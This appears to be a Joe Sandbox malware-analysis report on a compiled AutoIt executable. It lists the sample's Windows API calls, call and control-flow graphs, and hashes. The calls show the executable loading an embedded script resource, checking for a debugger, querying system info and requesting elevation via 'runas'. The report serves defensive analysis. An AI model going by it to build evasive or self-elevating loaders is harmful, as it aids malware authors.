7ff73a2055d4 15 API calls _mbstowcs_s_l 94621->94679 94622 7ff73a217568 94624 7ff73a2175b5 94622->94624 94681 7ff73a217284 67 API calls 2 library calls 94622->94681 94629 7ff73a2175ec 94624->94629 94682 7ff73a216de4 67 API calls 4 library calls 94624->94682 94625 7ff73a21753e 94625->94602 94628 7ff73a2175e8 94628->94629 94630 7ff73a2175fe 94628->94630 94683 7ff73a2104b8 94629->94683 94630->94611 94632 7ff73a217681 CloseHandle CreateFileW 94630->94632 94633 7ff73a2176cb GetLastError 94632->94633 94634 7ff73a2176f9 94632->94634 94698 7ff73a205564 15 API calls 2 library calls 94633->94698 94634->94611 94636 7ff73a2176d8 94699 7ff73a20e548 16 API calls 2 library calls 94636->94699 94638->94589 94639->94593 94642 7ff73a2170a4 94641->94642 94651 7ff73a2170be 94641->94651 94643 7ff73a2055d4 _mbstowcs_s_l 15 API calls 94642->94643 94642->94651 94644 7ff73a2170b3 94643->94644 94645 7ff73a20b164 _invalid_parameter_noinfo 31 API calls 94644->94645 94645->94651 94646 7ff73a2171ec 94646->94598 94646->94599 94647 7ff73a21718c 94647->94646 94649 7ff73a202554 31 API calls 94647->94649 94648 7ff73a21713b 94648->94647 94650 7ff73a2055d4 _mbstowcs_s_l 15 API calls 94648->94650 94652 7ff73a2171e8 94649->94652 94653 7ff73a217181 94650->94653 94651->94648 94654 7ff73a2055d4 _mbstowcs_s_l 15 API calls 94651->94654 94652->94646 94655 7ff73a21726b 94652->94655 94656 7ff73a20b164 _invalid_parameter_noinfo 31 API calls 94653->94656 94657 7ff73a217130 94654->94657 94658 7ff73a20b184 _isindst 16 API calls 94655->94658 94656->94647 94659 7ff73a20b164 _invalid_parameter_noinfo 31 API calls 94657->94659 94660 7ff73a217280 94658->94660 94659->94648 94662 7ff73a20b9bc _isindst EnterCriticalSection 94661->94662 94669 7ff73a20e43b 94662->94669 94663 7ff73a20e487 94665 7ff73a20ba10 _isindst LeaveCriticalSection 94663->94665 94664 7ff73a20e464 94666 7ff73a20e170 16 API calls 94664->94666 94667 7ff73a20e52a 94665->94667 94668 7ff73a20e469 94666->94668 94667->94604 94667->94605 94668->94663 94672 7ff73a20e310 fwprintf EnterCriticalSection 94668->94672 94669->94663 94669->94664 94670 7ff73a20e4c2 EnterCriticalSection 94669->94670 94670->94663 94671 7ff73a20e4d1 LeaveCriticalSection 94670->94671 94671->94669 94672->94663 94673->94602 94674->94611 94675->94614 94676->94602 94677->94602 94678->94619 94679->94625 94680->94622 94681->94624 94682->94628 94684 7ff73a20e604 31 API calls 94683->94684 94687 7ff73a2104cc 94684->94687 94685 7ff73a2104d2 94686 7ff73a20e548 16 API calls 94685->94686 94690 7ff73a210534 94686->94690 94687->94685 94688 7ff73a20e604 31 API calls 94687->94688 94697 7ff73a21050c 94687->94697 94692 7ff73a2104ff 94688->94692 94689 7ff73a20e604 31 API calls 94693 7ff73a210518 CloseHandle 94689->94693 94691 7ff73a210560 94690->94691 94695 7ff73a205564 fread_s 15 API calls 94690->94695 94691->94611 94696 7ff73a20e604 31 API calls 94692->94696 94693->94685 94694 7ff73a210525 GetLastError 94693->94694 94694->94685 94695->94691 94696->94697 94697->94685 94697->94689 94698->94636 94699->94634 94701 7ff73a1d6ce3 94700->94701 94702 7ff73a1d6d2c LoadLibraryA 94700->94702 94701->94519 94701->94522 94702->94701 94703 7ff73a1d6d41 GetProcAddress 94702->94703 94703->94701 94704->94533 94708 7ff73a204c7c 94705->94708 94709 7ff73a204ca6 94708->94709 94720 7ff73a1d680a 94708->94720 94710 7ff73a204cb5 memcpy_s 94709->94710 94711 7ff73a204cd7 94709->94711 94709->94720 94721 7ff73a2055d4 15 API calls _mbstowcs_s_l 94710->94721 94723 7ff73a1fdf54 EnterCriticalSection 94711->94723 94715 7ff73a204cca 94722 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94715->94722 94720->94543 94721->94715 94722->94720 94727 7ff73a2047bc 94724->94727 94726 7ff73a252210 94726->94545 94730 7ff73a204724 94727->94730 94731 7ff73a204732 94730->94731 94733 7ff73a204746 94730->94733 94738 7ff73a2055d4 15 API calls _mbstowcs_s_l 94731->94738 94732 7ff73a204742 94732->94726 94733->94732 94740 7ff73a20bef8 6 API calls __crtLCMapStringW 94733->94740 94736 7ff73a204737 94739 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94736->94739 94738->94736 94739->94732 94740->94732 94742 7ff73a1e1c5f 94741->94742 94743 7ff73a1e1a48 94741->94743 94742->94421 94749 7ff73a1e1a90 94743->94749 94758 7ff73a1f5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94743->94758 94749->94421 94753 7ff73a1df1ce 94752->94753 94755 7ff73a1df1d8 94752->94755 94754 7ff73a1e1a30 45 API calls 94753->94754 94754->94755 94755->94431 94756->94429 94757->94425 94759->94444 94760->94449 94761->94443 94762->94451 94763->94454 94764->94464 94765->94463 94768 7ff73a252bae 94766->94768 94767 7ff73a1d67d8 45 API calls 94767->94768 94768->94767 94769 7ff73a25240c 32 API calls 94768->94769 94770 7ff73a2529da 94768->94770 94769->94768 94770->94470 94770->94483 94772 7ff73a251d61 94771->94772 94773 7ff73a251d71 94771->94773 94774 7ff73a2048e0 89 API calls 94772->94774 94775 7ff73a251dbf 94773->94775 94776 7ff73a2048e0 89 API calls 94773->94776 94778 7ff73a251d7a 94773->94778 94774->94773 94798 7ff73a252038 94775->94798 94779 7ff73a251d9e 94776->94779 94778->94483 94779->94775 94780 7ff73a251da7 94779->94780 94780->94778 94810 7ff73a204970 94780->94810 94781 7ff73a251df5 94782 7ff73a251e1c 94781->94782 94783 7ff73a251df9 94781->94783 94787 7ff73a251e4a 94782->94787 94788 7ff73a251e2a 94782->94788 94785 7ff73a251e07 94783->94785 94786 7ff73a204970 62 API calls 94783->94786 94785->94778 94789 7ff73a204970 62 API calls 94785->94789 94786->94785 94802 7ff73a251e88 94787->94802 94790 7ff73a251e38 94788->94790 94792 7ff73a204970 62 API calls 94788->94792 94789->94778 94790->94778 94793 7ff73a204970 62 API calls 94790->94793 94792->94790 94793->94778 94794 7ff73a251e68 94794->94778 94797 7ff73a204970 62 API calls 94794->94797 94795 7ff73a251e52 94795->94794 94796 7ff73a204970 62 API calls 94795->94796 94796->94794 94797->94778 94799 7ff73a252069 94798->94799 94800 7ff73a252056 memcpy_s 94798->94800 94801 7ff73a204c5c _fread_nolock 45 API calls 94799->94801 94800->94781 94801->94800 94803 7ff73a251fb0 94802->94803 94809 7ff73a251eaa 94802->94809 94805 7ff73a251fd3 94803->94805 94824 7ff73a202a04 60 API calls 2 library calls 94803->94824 94805->94795 94806 7ff73a251bd0 45 API calls 94806->94809 94809->94803 94809->94805 94809->94806 94822 7ff73a251c9c 45 API calls 94809->94822 94823 7ff73a2520cc 60 API calls 94809->94823 94811 7ff73a20498e 94810->94811 94813 7ff73a2049a3 94810->94813 94826 7ff73a2055d4 15 API calls _mbstowcs_s_l 94811->94826 94818 7ff73a20499e 94813->94818 94825 7ff73a1fdf54 EnterCriticalSection 94813->94825 94814 7ff73a204993 94827 7ff73a20b164 31 API calls _invalid_parameter_noinfo 94814->94827 94817 7ff73a2049b9 94819 7ff73a2048ec 60 API calls 94817->94819 94818->94778 94820 7ff73a2049c2 94819->94820 94821 7ff73a1fdf60 fread_s LeaveCriticalSection 94820->94821 94821->94818 94822->94809 94823->94809 94824->94805 94826->94814 94827->94818 94829 7ff73a218f90 wcsftime 94828->94829 94830 7ff73a1d3ec4 GetLongPathNameW 94829->94830 94831 7ff73a1d7cf4 4 API calls 94830->94831 94832 7ff73a1d3eed 94831->94832 94833 7ff73a1d4074 94832->94833 94834 7ff73a1d9640 4 API calls 94833->94834 94835 7ff73a1d408e 94834->94835 94836 7ff73a1d56d4 5 API calls 94835->94836 94837 7ff73a1d409b 94836->94837 94838 7ff73a21bada 94837->94838 94839 7ff73a1d40a7 94837->94839 94845 7ff73a21bb0f 94838->94845 94880 7ff73a1f1ad0 CompareStringW 94838->94880 94840 7ff73a1d4680 4 API calls 94839->94840 94842 7ff73a1d40b5 94840->94842 94876 7ff73a1d40e8 94842->94876 94844 7ff73a1d40cb 94844->94354 94847 7ff73a1d6460 105 API calls 94846->94847 94848 7ff73a1d63e5 94847->94848 94849 7ff73a21c656 94848->94849 94851 7ff73a1d6460 105 API calls 94848->94851 94850 7ff73a252948 90 API calls 94849->94850 94852 7ff73a21c66e 94850->94852 94853 7ff73a1d6400 94851->94853 94854 7ff73a21c690 94852->94854 94855 7ff73a21c672 94852->94855 94853->94849 94856 7ff73a1d6408 94853->94856 94858 7ff73a1f4c68 4 API calls 94854->94858 94857 7ff73a1d652c 63 API calls 94855->94857 94859 7ff73a1d6414 94856->94859 94860 7ff73a21c67b 94856->94860 94857->94860 94875 7ff73a21c6dd 94858->94875 94881 7ff73a1de774 143 API calls 94859->94881 94882 7ff73a24c5c8 77 API calls wprintf 94860->94882 94863 7ff73a1d6438 94863->94348 94864 7ff73a21c68a 94864->94854 94865 7ff73a21c895 94866 7ff73a1d652c 63 API calls 94865->94866 94874 7ff73a21c8a9 94866->94874 94871 7ff73a1dec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94871->94875 94874->94865 94888 7ff73a2476d8 77 API calls 2 library calls 94874->94888 94875->94865 94875->94871 94875->94874 94883 7ff73a247400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94875->94883 94884 7ff73a24730c 39 API calls 94875->94884 94885 7ff73a250210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94875->94885 94886 7ff73a1db26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94875->94886 94887 7ff73a1d9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94875->94887 94877 7ff73a1d4107 94876->94877 94879 7ff73a1d4130 memcpy_s 94876->94879 94878 7ff73a1f4c68 4 API calls 94877->94878 94878->94879 94879->94844 94880->94838 94881->94863 94882->94864 94883->94875 94884->94875 94885->94875 94886->94875 94887->94875 94888->94874 94890 7ff73a1d988d 94889->94890 94891 7ff73a1d9762 94889->94891 94890->94359 94891->94890 94892 7ff73a1f4c68 4 API calls 94891->94892 94893 7ff73a1d9791 94892->94893 94894 7ff73a1f4c68 4 API calls 94893->94894 94896 7ff73a1d981c 94894->94896 94896->94890 94901 7ff73a1dabe0 81 API calls memcpy_s 94896->94901 94902 7ff73a1d9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94896->94902 94903 7ff73a1db26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94896->94903 94899->94362 94900->94364 94901->94896 94902->94896 94903->94896 94904->94374

      Control-flow Graph

      APIs
      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D37F2
      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D3807
      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D388D
        • Part of subcall function 00007FF73A1D3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF73A1D38BF,?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D3FFD
      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D3924
      • MessageBoxA.USER32 ref: 00007FF73A21B888
      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A21B8E1
      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A21B968
      • ShellExecuteW.SHELL32 ref: 00007FF73A21B98F
        • Part of subcall function 00007FF73A1D3B84: GetSysColorBrush.USER32 ref: 00007FF73A1D3B9E
        • Part of subcall function 00007FF73A1D3B84: LoadCursorW.USER32 ref: 00007FF73A1D3BAE
        • Part of subcall function 00007FF73A1D3B84: LoadIconW.USER32 ref: 00007FF73A1D3BC3
        • Part of subcall function 00007FF73A1D3B84: LoadIconW.USER32 ref: 00007FF73A1D3BDC
        • Part of subcall function 00007FF73A1D3B84: LoadIconW.USER32 ref: 00007FF73A1D3BF5
        • Part of subcall function 00007FF73A1D3B84: LoadImageW.USER32 ref: 00007FF73A1D3C21
        • Part of subcall function 00007FF73A1D3B84: RegisterClassExW.USER32 ref: 00007FF73A1D3C85
        • Part of subcall function 00007FF73A1D3CBC: CreateWindowExW.USER32 ref: 00007FF73A1D3D0C
        • Part of subcall function 00007FF73A1D3CBC: CreateWindowExW.USER32 ref: 00007FF73A1D3D5F
        • Part of subcall function 00007FF73A1D3CBC: ShowWindow.USER32 ref: 00007FF73A1D3D75
        • Part of subcall function 00007FF73A1D6258: Shell_NotifyIconW.SHELL32 ref: 00007FF73A1D6350
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
      • String ID: This is a third-party compiled AutoIt script.$runas
      • API String ID: 1593035822-3287110873
      • Opcode ID: 687d5aa74b75c3fb8b6edfb8cb33900bb1dfa26bff14e5511f16aedfd4cdf8c2
      • Instruction ID: 3795b7ccaaba7f542e21070a57eaca89adfc61aff7aa86a56ded5c9f9856dc9e
      • Opcode Fuzzy Hash: 687d5aa74b75c3fb8b6edfb8cb33900bb1dfa26bff14e5511f16aedfd4cdf8c2
      • Instruction Fuzzy Hash: 3F713C6A91C983B5FA20BB64E8421F9E765BF81754FC001B5E58D461A6DF2CE609F330

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 352 7ff73a1d6580-7ff73a1d65fc call 7ff73a1f4c68 call 7ff73a1d6c98 call 7ff73a1f5d00 359 7ff73a1d6602-7ff73a1d6606 352->359 360 7ff73a1d6737-7ff73a1d673a 352->360 363 7ff73a1d660c-7ff73a1d6617 call 7ff73a205514 359->363 364 7ff73a21ca03-7ff73a21ca1e 359->364 361 7ff73a1d6740-7ff73a1d6753 CreateStreamOnHGlobal 360->361 362 7ff73a21c9f5-7ff73a21c9fd call 7ff73a252e00 360->362 361->359 366 7ff73a1d6759-7ff73a1d6777 FindResourceExW 361->366 362->364 373 7ff73a1d661b-7ff73a1d664e call 7ff73a1d67d8 363->373 375 7ff73a21ca27-7ff73a21ca60 call 7ff73a1d6810 call 7ff73a1d67d8 364->375 366->359 370 7ff73a1d677d 366->370 372 7ff73a21c97e-7ff73a21c991 LoadResource 370->372 372->359 376 7ff73a21c997-7ff73a21c9a8 SizeofResource 372->376 380 7ff73a1d6654-7ff73a1d665f 373->380 381 7ff73a1d66e8 373->381 384 7ff73a1d66ee 375->384 397 7ff73a21ca66 375->397 376->359 379 7ff73a21c9ae-7ff73a21c9ba LockResource 376->379 379->359 383 7ff73a21c9c0-7ff73a21c9f0 379->383 385 7ff73a1d6661-7ff73a1d666f 380->385 386 7ff73a1d66ae-7ff73a1d66b2 380->386 381->384 383->359 388 7ff73a1d66f1-7ff73a1d6715 384->388 389 7ff73a1d6670-7ff73a1d667d 385->389 386->381 390 7ff73a1d66b4-7ff73a1d66cf call 7ff73a1d6810 386->390 393 7ff73a1d6717-7ff73a1d6724 call 7ff73a1f4c24 * 2 388->393 394 7ff73a1d6729-7ff73a1d6736 388->394 395 7ff73a1d6680-7ff73a1d668f 389->395 390->373 393->394 399 7ff73a1d66d4-7ff73a1d66dd 395->399 400 7ff73a1d6691-7ff73a1d6695 395->400 397->388 405 7ff73a1d66e3-7ff73a1d66e6 399->405 406 7ff73a1d6782-7ff73a1d678c 399->406 400->375 404 7ff73a1d669b-7ff73a1d66a8 400->404 404->389 408 7ff73a1d66aa 404->408 405->400 409 7ff73a1d678e 406->409 410 7ff73a1d6797-7ff73a1d67a1 406->410 408->386 409->410 411 7ff73a1d67a3-7ff73a1d67ad 410->411 412 7ff73a1d67ce 410->412 413 7ff73a1d67c6 411->413 414 7ff73a1d67af-7ff73a1d67bb 411->414 412->372 413->412 414->395 415 7ff73a1d67c1 414->415 415->413
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
      • String ID: AU3!$EA06$SCRIPT
      • API String ID: 3051347437-2925976212
      • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
      • Instruction ID: 0ec5c84ab82e927ceca2217b540f92b68d32ded45f1416ccadfa8c2414be9a49
      • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
      • Instruction Fuzzy Hash: 0691107BB2964196FB20EB21A446ABCB7B5BB44B84F814172DE6D47781DF3CE404A320

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 482 7ff73a1f1d80-7ff73a1f1e17 call 7ff73a1d9640 GetVersionExW call 7ff73a1d7cf4 487 7ff73a1f1e1d 482->487 488 7ff73a239450 482->488 489 7ff73a1f1e20-7ff73a1f1e46 call 7ff73a1ddda4 487->489 490 7ff73a239457-7ff73a23945d 488->490 495 7ff73a1f1fc1 489->495 496 7ff73a1f1e4c 489->496 492 7ff73a239463-7ff73a239480 490->492 492->492 494 7ff73a239482-7ff73a239485 492->494 494->489 497 7ff73a23948b-7ff73a239491 494->497 495->488 498 7ff73a1f1e53-7ff73a1f1e59 496->498 497->490 499 7ff73a239493 497->499 500 7ff73a1f1e5f-7ff73a1f1e7c 498->500 502 7ff73a239498-7ff73a2394a1 499->502 500->500 501 7ff73a1f1e7e-7ff73a1f1e81 500->501 501->502 503 7ff73a1f1e87-7ff73a1f1ed6 call 7ff73a1ddda4 501->503 502->498 504 7ff73a2394a7 502->504 507 7ff73a1f1edc-7ff73a1f1ede 503->507 508 7ff73a239645-7ff73a23964d 503->508 504->495 511 7ff73a1f1ee4-7ff73a1f1efa 507->511 512 7ff73a2394ac-7ff73a2394af 507->512 509 7ff73a23965a-7ff73a23965d 508->509 510 7ff73a23964f-7ff73a239658 508->510 515 7ff73a239686-7ff73a239692 509->515 516 7ff73a23965f-7ff73a239674 509->516 510->515 517 7ff73a1f1f00-7ff73a1f1f02 511->517 518 7ff73a239572-7ff73a239579 511->518 513 7ff73a1f1f3c-7ff73a1f1f80 GetCurrentProcess IsWow64Process call 7ff73a1f6240 512->513 514 7ff73a2394b5-7ff73a239501 512->514 530 7ff73a23969d-7ff73a2396b3 call 7ff73a2432f4 513->530 535 7ff73a1f1f86-7ff73a1f1f8b GetSystemInfo 513->535 514->513 520 7ff73a239507-7ff73a23950e 514->520 515->530 521 7ff73a23967f 516->521 522 7ff73a239676-7ff73a23967d 516->522 525 7ff73a23959e-7ff73a2395b3 517->525 526 7ff73a1f1f08-7ff73a1f1f0b 517->526 523 7ff73a239589-7ff73a239599 518->523 524 7ff73a23957b-7ff73a239584 518->524 528 7ff73a239510-7ff73a239518 520->528 529 7ff73a239534-7ff73a23953c 520->529 521->515 522->515 523->513 524->513 533 7ff73a2395b5-7ff73a2395be 525->533 534 7ff73a2395c3-7ff73a2395d3 525->534 531 7ff73a1f1f11-7ff73a1f1f2d 526->531 532 7ff73a2395ed-7ff73a2395f0 526->532 537 7ff73a23951a-7ff73a239521 528->537 538 7ff73a239526-7ff73a23952f 528->538 539 7ff73a23953e-7ff73a239547 529->539 540 7ff73a23954c-7ff73a239554 529->540 550 7ff73a2396d7-7ff73a2396dc GetSystemInfo 530->550 551 7ff73a2396b5-7ff73a2396d5 call 7ff73a2432f4 530->551 542 7ff73a2395d8-7ff73a2395e8 531->542 543 7ff73a1f1f33 531->543 532->513 536 7ff73a2395f6-7ff73a239620 532->536 533->513 534->513 545 7ff73a1f1f91-7ff73a1f1fc0 535->545 546 7ff73a239622-7ff73a23962b 536->546 547 7ff73a239630-7ff73a239640 536->547 537->513 538->513 539->513 548 7ff73a239556-7ff73a23955f 540->548 549 7ff73a239564-7ff73a23956d 540->549 542->513 543->513 546->513 547->513 548->513 549->513 553 7ff73a2396e2-7ff73a2396ea 550->553 551->553 553->545 555 7ff73a2396f0-7ff73a2396f7 FreeLibrary 553->555 555->545
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$CurrentInfoSystemVersionWow64
      • String ID: |O
      • API String ID: 1568231622-607156228
      • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
      • Instruction ID: d0846c6bd326514784ef03bca828dc63b6e13d5c9634e6db698e8f62aba0cd5d
      • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
      • Instruction Fuzzy Hash: 5CD1A129E1E6C2A5F670AB15A81317AF760AF92784FC001F5DACD062A5DF6CB504F731
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: FileFind$AttributesCloseFirstlstrlen
      • String ID:
      • API String ID: 2695905019-0
      • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
      • Instruction ID: 0590e8c466db258f60a67147a9e7c2e127cd7b8cef009ca8e7f385f7e064331c
      • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
      • Instruction Fuzzy Hash: 9DF08218E08712D1FA656B28B80E338A360AFC1B75FD44370E47F462E4DF6CD4987610

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
      • API String ID: 2667193904-1575078665
      • Opcode ID: 295aa6e3056577020a18fb2233550ef2ad9e2162ae18efbe058a416b4de70f32
      • Instruction ID: ba538910ec74a8bc9ab78143560558a54e85cb008f1a7c353ac1191c41155736
      • Opcode Fuzzy Hash: 295aa6e3056577020a18fb2233550ef2ad9e2162ae18efbe058a416b4de70f32
      • Instruction Fuzzy Hash: 2A913C2AA18A82A5FB10BB24E8420B9F364FFC4744FC01272E58D46AA5EF6CD545F721

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 131 7ff73a1d5dec-7ff73a1d5e21 133 7ff73a1d5e23-7ff73a1d5e26 131->133 134 7ff73a1d5e91-7ff73a1d5e94 131->134 135 7ff73a1d5e98 133->135 136 7ff73a1d5e28-7ff73a1d5e2f 133->136 134->133 137 7ff73a1d5e96 134->137 141 7ff73a21c229-7ff73a21c261 call 7ff73a1eede4 call 7ff73a1f2c44 135->141 142 7ff73a1d5e9e-7ff73a1d5ea3 135->142 138 7ff73a1d5e35-7ff73a1d5e3a 136->138 139 7ff73a1d5f21-7ff73a1d5f29 PostQuitMessage 136->139 140 7ff73a1d5e6b-7ff73a1d5e76 DefWindowProcW 137->140 145 7ff73a1d5e40-7ff73a1d5e43 138->145 146 7ff73a21c2af-7ff73a21c2c5 call 7ff73a24a40c 138->146 149 7ff73a1d5ec8-7ff73a1d5eca 139->149 148 7ff73a1d5e7c-7ff73a1d5e90 140->148 178 7ff73a21c267-7ff73a21c26e 141->178 143 7ff73a1d5ea5-7ff73a1d5ea8 142->143 144 7ff73a1d5ecc-7ff73a1d5efa SetTimer RegisterWindowMessageW 142->144 150 7ff73a21c1b8-7ff73a21c1bb 143->150 151 7ff73a1d5eae-7ff73a1d5ebe KillTimer call 7ff73a1d5d88 143->151 144->149 152 7ff73a1d5efc-7ff73a1d5f09 CreatePopupMenu 144->152 153 7ff73a1d5f2b-7ff73a1d5f35 call 7ff73a1f4610 145->153 154 7ff73a1d5e49-7ff73a1d5e4e 145->154 146->149 171 7ff73a21c2cb 146->171 149->148 157 7ff73a21c1f7-7ff73a21c224 MoveWindow 150->157 158 7ff73a21c1bd-7ff73a21c1c0 150->158 167 7ff73a1d5ec3 call 7ff73a1d7098 151->167 152->149 173 7ff73a1d5f3a 153->173 160 7ff73a1d5e54-7ff73a1d5e59 154->160 161 7ff73a21c292-7ff73a21c299 154->161 157->149 165 7ff73a21c1c2-7ff73a21c1c5 158->165 166 7ff73a21c1e4-7ff73a21c1f2 SetFocus 158->166 169 7ff73a1d5e5f-7ff73a1d5e65 160->169 170 7ff73a1d5f0b-7ff73a1d5f1f call 7ff73a1d5f3c 160->170 161->140 168 7ff73a21c29f-7ff73a21c2aa call 7ff73a23c54c 161->168 165->169 174 7ff73a21c1cb-7ff73a21c1df call 7ff73a1eede4 165->174 166->149 167->149 168->140 169->140 169->178 170->149 171->140 173->149 174->149 178->140 182 7ff73a21c274-7ff73a21c28d call 7ff73a1d5d88 call 7ff73a1d6258 178->182 182->140
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
